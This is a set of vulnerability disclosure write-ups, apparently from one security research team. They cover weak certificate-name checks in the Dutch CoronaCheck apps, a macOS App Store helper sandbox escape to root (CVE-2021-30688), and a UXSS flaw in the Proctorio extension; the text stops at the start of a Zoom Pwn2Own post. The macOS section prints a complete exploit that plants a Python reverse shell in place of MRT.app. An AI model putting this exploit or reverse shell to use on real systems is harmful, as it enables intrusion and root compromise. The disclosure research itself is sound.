The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name. Instead, it checked that a specific string occurred in the domain (coronacheck.nl) and that it ended with a specific string (.nl). This means that an attacker with a certificate for coronacheck.nl.example.nl could also CMS sign API responses.
- (BOOL)validateCommonNameForCertificate:(X509 *)certificate
                         requiredContent:(NSString *)requiredContent
                          requiredSuffix:(NSString *)requiredSuffix {

    // Get subject from certificate
    X509_NAME *certificateSubjectName = X509_get_subject_name(certificate);

    // Get Common Name from certificate subject
    char certificateCommonName[256];
    X509_NAME_get_text_by_NID(certificateSubjectName, NID_commonName, certificateCommonName, 256);
    NSString *cnString = [NSString stringWithUTF8String:certificateCommonName];

    // Compare Common Name to required content and required suffix
    BOOL containsRequiredContent = [cnString rangeOfString:requiredContent options:NSCaseInsensitiveSearch].location != NSNotFound;
    BOOL hasCorrectSuffix = [cnString hasSuffix:requiredSuffix];

    certificateSubjectName = NULL;

    return hasCorrectSuffix && containsRequiredContent;
}
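A Python model of this check shows why "contains" plus "ends with" is weaker than comparing against the expected domain. The function names are ours, and the stricter variant is only one possible way to express the intended rule, not the fix that was applied.

```python
def weak_cn_check(cn: str, required_content: str, required_suffix: str) -> bool:
    """Model of the flawed check: substring match plus suffix match."""
    contains = required_content.lower() in cn.lower()
    return contains and cn.endswith(required_suffix)


def strict_cn_check(cn: str, allowed_domain: str) -> bool:
    """Accept only the domain itself or a subdomain of it."""
    cn = cn.lower()
    allowed_domain = allowed_domain.lower()
    return cn == allowed_domain or cn.endswith("." + allowed_domain)


attacker_cn = "coronacheck.nl.example.nl"

print(weak_cn_check(attacker_cn, "coronacheck.nl", ".nl"))      # True
print(strict_cn_check(attacker_cn, "coronacheck.nl"))           # False
print(strict_cn_check("api.coronacheck.nl", "coronacheck.nl"))  # True
```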
The only issue we found on the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not bound on the right, making also possible to bypass it using coronacheck.nl.example.com.
if(cnMatchingRegex!=null){if(!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any{valcn=IETFUtils.valueToString(it.first.value)cnMatchingRegex.containsMatchIn(cn)}){throwSignatureValidationException("Signing certificate does not match expected CN")}}
Because these certificates had to be issued by PKI-Overheid (a CA run by the Dutch government), it might not have been easy to obtain a certificate with such a domain name.
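The difference between an unanchored and an anchored match can be sketched as follows. The patterns are hypothetical (the app's real expression is not shown here); re.search plays the role of Kotlin's containsMatchIn.

```python
import re

# Hypothetical patterns, chosen only to illustrate the missing right-hand anchor.
UNANCHORED = re.compile(r"coronacheck\.nl")
ANCHORED = re.compile(r"(^|\.)coronacheck\.nl\Z")


def unanchored_match(cn: str) -> bool:
    """Accept any name that contains the expected domain somewhere."""
    return UNANCHORED.search(cn) is not None


def anchored_match(cn: str) -> bool:
    """Accept only names that end in the expected domain."""
    return ANCHORED.search(cn) is not None
```

Here unanchored_match("coronacheck.nl.example.com") succeeds, whereas anchored_match only accepts names such as "holder.coronacheck.nl" that actually end in the expected domain.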
Race condition
We also found a race condition in the application of the certificate validation rules. As we mentioned, the rules the app applied for certificate validation were stricter for VWS connections than for connections to test providers, and even for connections to VWS there were different levels of strictness. However, if two requests were performed in quick succession, the first request could be validated based on the verification rules specified for the second request. In practice, the least strict verification rules still require a valid certificate, so this cannot be used to intercept connections either. However, it was already being triggered in normal use, as the app initiated two requests with different validation rules immediately after starting.
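A simplified model of this kind of race is sketched below. It is not the app's code: the class names and the rule labels are hypothetical, and the interleaving is made explicit instead of relying on real concurrency. The point is only that a rule stored in shared state can be overwritten before the earlier request is validated.

```python
class SharedValidator:
    """Keeps the validation rule in one shared field (the risky design)."""

    def __init__(self) -> None:
        self.current_rule = None

    def start_request(self, rule: str) -> None:
        # Each new request overwrites the rule of any request still in flight.
        self.current_rule = rule

    def validate(self) -> str:
        # Validation runs later and reads whatever rule was stored last.
        return self.current_rule


class PerRequestValidator:
    """Binds the rule to the request itself, so requests cannot interfere."""

    def start_request(self, rule: str):
        # The returned callable remembers the rule of this request only.
        return lambda: rule
```

If a "strict" request and a "lenient" request are started back to back on a SharedValidator, the validation of the first one sees "lenient". With PerRequestValidator each request keeps its own rule.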
Reporting
We reported these vulnerabilities to the email address on the “Kwetsbaarheid melden” (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.
In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.
Developers are of course not required to keep us in the loop after we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.
Recommendation
TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as “the domain must contain the string …” (instead of “must end with …”) have no security benefit and should be avoided.
Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.
Conclusion
We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since then been fixed.
CVE-2021-30688 is a vulnerability which was fixed in macOS 11.4 that allowed a malicious application to escape the Mac Application Sandbox and to escalate its privileges to root. This vulnerability required a strange exploitation path due to the sandbox profile of the affected service.
Background
At rC3 in 2020 and HITB Amsterdam 2021 Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications. A privileged helper tool is a service which runs as root and which is used for only a specific task that needs root privileges. In this case, this could be installing a package file.
Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:
Not verifying if a request to install a package comes from the main application.
Not correctly verifying the authenticity of an update package.
As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different way…
About StorePrivilegedTaskService
StorePrivilegedTaskService is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework private framework.
To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.
First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Apple’s operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.
XPC services
An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.
For example, suppose an application needs network functionality for only one feature: to download a fixed URL. This means that when sandboxing the application, it would need full network client access (i.e. the com.apple.security.network.client entitlement). A vulnerability in this application can then also use the network access to send out arbitrary network traffic. If the functionality for performing the request would be moved to a different XPC service, then only this service would need the network permission. Compromising the main application would only allow it to retrieve that URL and compromising the XPC service would be unlikely, as it requires very little code. This pattern is how Apple uses these services throughout the system.
These services can have one of 3 possible service types:
Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
System: only one instance of the XPC service is running and it runs as root. Only available for Apple’s own XPC services.
Mach services
While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.
NSXPCConnection is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods. All serialization of objects as arguments is handled automatically.
Permissions
XPC services in third-party applications rarely have interesting permissions to steal compared to a non-sandboxed application. Sandboxed services can have entitlements that create sandbox exceptions, for example to allow the service to access the network. For a non-sandboxed application, these entitlements are not interesting to steal, because that application is not restricted by the sandbox in the first place. TCC permissions are also usually set for the main application, not its XPC services (as that would generate rather confusing prompts for the end user).
A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!
This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.
StorePrivilegedTaskService vulnerability
Sandbox escape
The main vulnerability in the StorePrivilegedTaskService XPC service was that it did not check the application initiating the connection. This service has a service type of System, so it would launch as root.
This vulnerability was exploitable due to defense-in-depth measures which were ineffective:
StorePrivilegedTaskService is sandboxed, but its custom sandboxing profile is not restrictive enough.
For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal.
This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.
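The path traversal problem in the subdirectory check can be illustrated with a small Python sketch. The function names are hypothetical, and the sketch assumes that the service compared the textual prefix of the path; the base directory is taken from the exploit code later in this post. Only absolute paths are considered, and symbolic links are ignored, which a real check would also need to handle.

```python
import posixpath


def naive_is_inside(path: str, base: str) -> bool:
    """Flawed check: only looks at the textual prefix of the path."""
    return path.startswith(base.rstrip("/") + "/")


def normalized_is_inside(path: str, base: str) -> bool:
    """Collapse '..' components before comparing against the base directory."""
    base = posixpath.normpath(base)
    resolved = posixpath.normpath(path)
    return posixpath.commonpath([resolved, base]) == base


BASE = "/System/Library/Caches/OnDemandResources/AssetPacks"
TRAVERSAL = BASE + "/../../../../../Library/Apple/System/Library/CoreServices/MRT.app"
```

naive_is_inside(TRAVERSAL, BASE) returns True even though the path resolves to a location outside BASE, while normalized_is_inside(TRAVERSAL, BASE) returns False.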
The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection. For example:
// Write a file
- (void)writeAssetPackMetadata:(NSData *)metadata toURL:(NSURL *)url withReplyHandler:(void (^)(NSError *))replyHandler;
// Delete an item
- (void)removePlaceholderAtPath:(NSString *)path withReplyHandler:(void (^)(NSError *))replyHandler;
// Change extended attributes for a path
- (void)setExtendedAttributeAtPath:(NSString *)path name:(NSString *)name value:(NSData *)value withReplyHandler:(void (^)(NSError *))replyHandler;
// Move an item
- (void)moveAssetPackAtPath:(NSString *)path toPath:(NSString *)toPath withReplyHandler:(void (^)(NSError *))replyHandler;
A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler: to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.
The service has a custom profile. The restrictions related to files and folders are:
The intent of these rules is that this service can modify specific files in applications currently downloading from the app store, so with a .appdownload extension. For example, adding a MASReceipt file and changing the icon.
The regexes here are the most interesting, mainly because they are anchored neither on the left nor on the right. On the left this makes sense, as the full path could be unknown, but the lack of an anchor on the right (with $) is a mistake for the file regexes.
Formulated simply, we can do the following with this sandboxing profile:
All operations are allowed on directories containing .app anywhere in their path.
All operations are allowed on files containing .appdownload/Icon anywhere in their path.
By creating a specific directory structure in the temporary files directory of our sandboxed application:
bar.appdownload/Icon/
Both the sandboxed application and the StorePrivilegedTaskService have full access inside the Icon folder. Therefore, it would be possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler: on the executable to dequarantine it.
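Why the directory structure above satisfies a rule meant for a single Icon file can be shown with a short Python sketch. The regular expressions are hypothetical approximations, not the rules from the actual sandbox profile.

```python
import re

# Hypothetical approximations of a file rule, with and without a right-hand anchor.
FILE_RULE_UNANCHORED = re.compile(r"\.appdownload/Icon")
FILE_RULE_ANCHORED = re.compile(r"\.appdownload/Icon$")

PAYLOAD_PATH = "/tmp/bar.appdownload/Icon/foo.app/Contents/MacOS/MRT"
INTENDED_PATH = "/Applications/Foo.appdownload/Icon"


def allowed(rule: "re.Pattern[str]", path: str) -> bool:
    """Return True when the rule matches anywhere in the path."""
    return rule.search(path) is not None
```

The unanchored rule allows both INTENDED_PATH and PAYLOAD_PATH, because everything below a directory named Icon still contains the matching text. The anchored variant only allows INTENDED_PATH.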
Privesc
This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.
Creating a new launch daemon or cron job is a common way to escalate privileges through file creation, but the sandbox profile path requirements would only allow a subdirectory of a subdirectory of the directories for these config files, so this did not work.
An option that would work would be to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools, the daemon points into the application bundle itself:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.microsoft.teams.TeamsUpdaterDaemon</string>
    <key>MachServices</key>
    <dict>
        <key>com.microsoft.teams.TeamsUpdaterDaemon</key>
        <true/>
    </dict>
    <key>Program</key>
    <string>/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon</string>
</dict>
</plist>
The following would work for privilege escalation:
Ask StorePrivilegedTaskService to move /Applications/Microsoft Teams.app somewhere else. Allowed, because the path of the directory contains .app.
Move a new app bundle to /Applications/Microsoft Teams.app, which contains a malicious executable file at Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon.
Connect to the com.microsoft.teams.TeamsUpdaterDaemon Mach service.
However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as a privilege escalation without this requirement, so we kept looking. The requirements are somewhat contradictory: typically anything bundled into an .app bundle runs as a normal user, not as root. In addition, the Signed System Volume on macOS Big Sur means changing any of the built-in applications is also impossible.
By an impressive and ironic coincidence, there is an application which is installed on a new macOS installation, not on the SSV and which runs automatically as root: MRT.app, the “Malware Removal Tool”. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updateable without performing a full system upgrade because they might be needed quickly. This means in particular that MRT.app is not on the SSV. Most malware is removed by signature or hash checks for malicious content; MRT is the more heavy-handed solution for when Apple needs to add code for performing the removal.
Although MRT.app is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.
Our complete attack consists of the following steps, from sandboxed application to code execution as root:
Create a new application bundle bar.appdownload/Icon/foo.app in the temporary directory of our sandboxed application containing a malicious executable.
Load the AppStoreDaemon.framework framework and connect to the StorePrivilegedTaskService XPC service.
Ask StorePrivilegedTaskService to change the quarantine attribute for the executable file to allow it to launch without a prompt.
Ask StorePrivilegedTaskService to move /Library/Apple/System/Library/CoreServices/MRT.app to a different location.
Ask StorePrivilegedTaskService to move bar.appdownload/Icon/foo.app from the temporary directory to /Library/Apple/System/Library/CoreServices/MRT.app.
Wait for a reboot.
See the full function here:
/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac AppStore sandbox of this process allow access.
NSString *path = [NSTemporaryDirectory() stringByAppendingPathComponent:@"bar.appdownload/Icon/foo.app"];
NSFileManager *fm = [NSFileManager defaultManager];
NSError *error = nil;

/// Cleanup, if needed.
[fm removeItemAtPath:path error:nil];

[fm createDirectoryAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS"] withIntermediateDirectories:TRUE attributes:nil error:&error];
assert(!error);

/// Create the payload. This example uses a Python reverse shell to 192.168.1.28:1337.
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.1.28\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);" writeToFile:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] atomically:TRUE encoding:NSUTF8StringEncoding error:&error];
assert(!error);

/// Make the payload executable
[fm setAttributes:@{NSFilePosixPermissions: [NSNumber numberWithShort:0777]} ofItemAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] error:&error];
assert(!error);

/// Load the framework, so the XPC service can be resolved.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];
[conn resume];

/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:replyHandler` method to create an unquarantined file.
[conn.remoteObjectProxy setExtendedAttributeAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] name:@"com.apple.quarantine" value:[@"00C3;60018532;Safari;" dataUsingEncoding:NSUTF8StringEncoding] withReplyHandler:^(NSError *result) {
    NSLog(@"%@", result);
    assert(result == nil);

    srand((unsigned int)time(NULL));

    /// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
    /// However, to move a directory, the permissions on the contents do not matter.
    /// It is moved to a randomly named directory, because the service refuses if it already exists.
    [conn.remoteObjectProxy moveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/MRT.app/" toPath:[NSString stringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT%d.app/", rand()] withReplyHandler:^(NSError *result) {
        NSLog(@"Result: %@", result);
        assert(result == nil);

        /// Move the malicious directory in place of MRT.app.
        [conn.remoteObjectProxy moveAssetPackAtPath:path toPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT.app/" withReplyHandler:^(NSError *result) {
            NSLog(@"Result: %@", result);

            /// At launch, /Library/Apple/System/Library/CoreServices/MRT.app/Contents/MacOS/MRT -d is started. So now time to wait for that...
        }];
    }];
}];
Fix
Apple has pushed out a fix in the macOS 11.4 release. They implemented all 3 of the recommended changes:
The entitlements of the process initiating the connection to StorePrivilegedTaskService are now checked.
The sandboxing profile of StorePrivilegedTaskService was tightened.
The path traversal vulnerabilities for the subdirectory check were fixed.
This means that the vulnerability is not just fixed: even if it were reintroduced later, it would be unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.
In February of 2020 the first person in The Netherlands tested positive for COVID-19, which quickly led to a national lockdown. After that universities had to close for physical lectures. This meant that universities quickly had to switch to both online lectures and tests.
For universities this posed a problem: how are you going to prevent students from cheating if they take the test in a location where you have neither control nor visibility? In The Netherlands most universities quickly adopted anti-cheating software that students were required to install in order to be able to take a test. This was to the dissatisfaction of students, who found this software to be too invasive of their privacy. Students were required to run monitoring software on their personal device that would monitor their behaviour via the webcam and screen recording.
The usage of this software was covered by national media on a regular basis, as students fought to stop universities from using this kind of software. This led to several court cases where universities had to defend the usage of this software. The judge ended up ruling in favour of the universities.
Proctorio is such monitoring software and it is used by most Dutch universities. For students this comes as a Google Chrome extension. And indeed, the extension has quite an extensive list of permissions. This includes the recording of your screen and permission to read and change all data on the websites that you visit.
All this was reason enough for us to take a closer look at this much-debated software. After all, vulnerabilities in this extension could have considerable privacy implications for students with this extension installed. In the end, we found a severe vulnerability that leads to a Universal Cross-Site Scripting vulnerability, which could be triggered by any website. This means that a malicious website visited by the user could steal or modify any data from every website, if the victim had the Proctorio extension installed. The vulnerability has since been fixed by Proctorio. As Chrome extensions are updated automatically, this requires no action from Proctorio users.
Background
Chrome extensions consist of two parts. A background page with JavaScript is the core of the extension, which has the permissions granted to the extension. It can add scripts to currently open tabs, which are known as content scripts. Content scripts have access to the DOM, but use a separate JavaScript environment. Content scripts do not have the full permissions of the background page, but their ability to communicate with the background page makes them more powerful than the JavaScript on a page itself.
Vulnerability details
The Proctorio extension inspects network traffic of the browser. When requests are observed for paths that match supported test taking websites, it injects some content scripts into the page. It tries to determine if the user is using a Proctorio-enabled test by retrieving details of the test using specific API endpoints used by the supported test websites.
Once a test is started, a toolbar is added with a number of buttons allowing a student to manage Proctorio. This includes a button to open a calculator, which supports some simple mathematical calculations.
When the user clicks the “=” button, a function is called in the content script to compute the result. The computation is performed by calling the eval() function in JavaScript; in the minified JavaScript this happens in the function named ghij. The function eval() is dangerous, as it can execute arbitrary JavaScript, not just mathematical expressions. The function ghij does not check that the input is actually a mathematical expression.
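As an illustration of the general principle (it is not Proctorio's code or fix), the following Python sketch evaluates calculator input without handing it to an eval-like function. The name safe_calc and the set of supported operators are assumptions made for this example; it parses the expression and only accepts numbers and basic arithmetic.

```python
import ast
import operator

# Operators a simple calculator needs; anything else is rejected.
_BINARY = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}
_UNARY = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def safe_calc(expression: str) -> float:
    """Evaluate plain arithmetic and raise ValueError for anything else."""

    def evaluate(node):
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BINARY:
            return _BINARY[type(node.op)](evaluate(node.left), evaluate(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY:
            return _UNARY[type(node.op)](evaluate(node.operand))
        raise ValueError("not a plain arithmetic expression")

    try:
        tree = ast.parse(expression, mode="eval")
    except SyntaxError as exc:
        raise ValueError("not a plain arithmetic expression") from exc
    return evaluate(tree.body)
```

Input such as "1 + 2 * 3" is computed as usual, while anything containing a function call, attribute access or a name raises ValueError instead of being executed.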
Because the calculator is added to the DOM of the page activating Proctorio, JavaScript on the page can automatically enter an expression for the calculator and then trigger the evaluation. This allows the webpage to execute code inside the content script. From the context of the content script, the page can then send messages to the background page that are handled as messages from the content script. Using a combination of messages, we found we could trigger UXSS.
(In our Zoom exploit, the calculator was opened just to demonstrate our ability to launch arbitrary applications, but in this case we actually exploit the calculator itself!)
Exploitation to UXSS
By using one of a number of specific paths in the URL, adding certain DOM elements and sending specific responses to a small number of API requests Proctorio can be activated by any website without user approval. By pretending to be in demo mode and automatically activating the demo, the page can start a complete Proctorio session. This happens completely automatically, without user interaction. Then, the page can open the calculator and use the exploit to execute code in the content script.
The content script itself does not have the full permissions of the browser extension, but it does have permission to send messages to the background page. The JavaScript on the background page supports a large number of different messages, each identified by a number indicated by the first element of the array which is the message.
The first thing that can be done using that is to download a URL while bypassing the Same Origin Policy. There are a number of different message types that will download a URL and return the result. For example, message number 502:
(The # is used here to make sure anything which is appended after it is not sent to the server.)
This downloads the URL in the session of the current user and returns the result to the page. This could be used to, for example, retrieve all of the user’s email messages if they are signed in to a webmail service that uses cookies for authentication. Normally, this is not allowed unless the URL uses the same origin, or the response specifically allows it using Cross-Origin Resource Sharing (CORS).
A CORS bypass is already a serious vulnerability, but it can be extended further. A universal cross-site scripting attack can be performed in the following way.
Some messages trigger the adding of new content scripts to the tab. Sometimes, variables need to be passed to those scripts. Most of the time those variables are escaped correctly, but when using a message with number 25, the argument is not escaped. The minified code for this function is:
This function c0693() contains a function which is converted to a string. This inner function is not executed by the background page; converting it to a string yields the source text of the function, which is then called in the content script with the argument a. Note that the last line in this function does not escape that value. This means that it is possible to include JavaScript, which is then executed in the context of the content script in the same tab that sent the message.
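The effect of pasting an unescaped argument into generated script text can be sketched as follows. This is a simplified model written in Python, not the extension's code: the function names and the JavaScript function handle are hypothetical. It contrasts plain concatenation with serializing the argument as a JSON string literal first.

```python
import json

# Source text of a hypothetical inner function that receives the argument.
INNER_FUNCTION = "function (a) { handle(a); }"


def build_script_unsafe(argument: str) -> str:
    """Paste the argument into the script text without any escaping."""
    return "(" + INNER_FUNCTION + ")(" + argument + ");"


def build_script_escaped(argument: str) -> str:
    """Serialize the argument as a JSON string literal before pasting it in."""
    return "(" + INNER_FUNCTION + ")(" + json.dumps(argument) + ");"


PAYLOAD = "0); alert(document.domain); (0"
```

With PAYLOAD, the unsafe variant produces script text in which alert(document.domain) is a separate statement, whereas the escaped variant keeps the whole payload inside one string literal.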
Evaluating JavaScript in the same tab again is not very useful on its own, but it is possible to make the tab switch origins in between sending the message and the execution of the new script. This is because the call to executeScript specifies the tab id, which doesn’t change when navigating to a different page.
Message with number 507 uses a synchronous XMLHttpRequest, which means that the JavaScript of the entire background page will be blocked while waiting for the HTTP response. By sending a request to a URL which is set up to always take 5 seconds to respond, then immediately sending a message with number 25 and then changing the location of the tab, the JavaScript from the 25 message is executed on a new page instead.
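The ordering of events in this race can be modelled with a toy simulation. The Python sketch below is not the extension's code: the Tab class and run_background_page are hypothetical, and the five-second delay is reduced to "the tab navigates while message 507 blocks". It only shows that the injected script ends up in whatever page the tab displays when message 25 is finally handled.

```python
class Tab:
    """A browser tab, identified by the object itself rather than by its origin."""

    def __init__(self, origin: str) -> None:
        self.origin = origin
        self.executed = []  # (origin at execution time, script) pairs


def run_background_page(tab: Tab, messages, navigate_during_block: str) -> None:
    """Handle messages strictly in order, like a single-threaded background page."""
    for number, argument in messages:
        if number == 507:
            # Synchronous request: no other message is handled until it returns.
            # Meanwhile the tab itself is free to navigate to another origin.
            tab.origin = navigate_during_block
        elif number == 25:
            # The script is injected by tab, so it runs in the page shown *now*.
            tab.executed.append((tab.origin, argument))
```

Starting from a tab on https://computest.nl and sending the messages 507 and 25 in that order, with a navigation to https://example.com while 507 blocks, the script is recorded as executed on https://example.com.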
For example, the following will allow the https://computest.nl origin to execute an alert on the https://example.com origin:
The URL https://computest.nl/sleep is used here as an example of a URL that takes 5 seconds to respond.
The video below demonstrates the attack:
Finally, the user could notice the fact that Proctorio is enabled based on the color of the Proctorio icon in the browser bar, which turns green once it activates. However, sending a message [32, false] turns this icon grey again, even though Proctorio is still active. The malicious webpage could quickly turn the icon grey again after exploiting the content script, which means the user only has a few milliseconds to notice the attack.
What can we do with UXSS?
An important security mechanism of your browser is called the Same Origin Policy (SOP). Without SOP surfing the web would be very insecure, as websites would then be able to read data from other domains (origins). It is the most important security control the browser has to enforce.
With a Universal XSS vulnerability a malicious webpage can run JavaScript on other pages, regardless of the origin. This makes this a very powerful primitive for an attacker to have in a browser. The video below shows that we can use this primitive to obtain a screenshot from the webcam and to download a GMail inbox, using our exploit from above.
For stealing GMail data we just need to inject some JavaScript that copies the content of the inbox and sends it to a server under our control. For getting a webcam screenshot we rely on the fact that most people will have allowed certain legitimate domains to have webcam access. In particular, users of Proctorio who had to enable their webcam for a test will have given the legitimate test website permission to use the webcam. We use UXSS to open a tab of such a domain and inject some JavaScript that grabs a webcam screenshot. In the example we rely on the fact that the victim has previously granted the domain zoom.us webcam access. This can be any page, but due to the pandemic we think that zoom.us would be a pretty safe bet. (The stuffed animal is called Dikkie Dik, from a well known Dutch children’s picture book.)
Disclosure
We contacted Proctorio with our findings on June 18th, 2021. They replied back within hours thanking us for our findings. Within a week (on June 25th) they reported that the vulnerability was fixed and a new version was pushed to the Google Chrome Web Store. We verified that the vulnerability was fixed on August 3rd. Since Google Chrome automatically updates installed extensions, this requires no further action from the end-user. At the time of writing version 1.4.21183.1 is the latest version.
In the fixed version, an iframe is used to load a webpage for the calculator, meaning exploiting this vulnerability is no longer possible.
Installing software on your (personal) device, either for work or for study, always adds new risks that end-users should be aware of. In general it is wise to uninstall software as soon as you no longer need it, in order to mitigate this risk. In this situation one could disable the Proctorio extension, to avoid it being accessible when you are not taking a test.
On April 7, 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003) we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had extensive experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows. So during this project we had a lot to learn about Windows internals.
Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Own pic.twitter.com/qpw7yIEQLS
This is going to be quite a long post. So before we dive into the details, below you can see a full run of the exploit (now fixed) in action. The rest of the post explains in detail every step that took place during the exploitation phase and how we came to this solution.
Announcement
Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didn't expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. We'd also be competing with many others who may have had a full year to prepare their exploits.
To our surprise, on January 27th Pwn2Own was officially announced with a new category: "Enterprise Communications", featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.
Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at https://t.co/suCceKxI0T #P2O
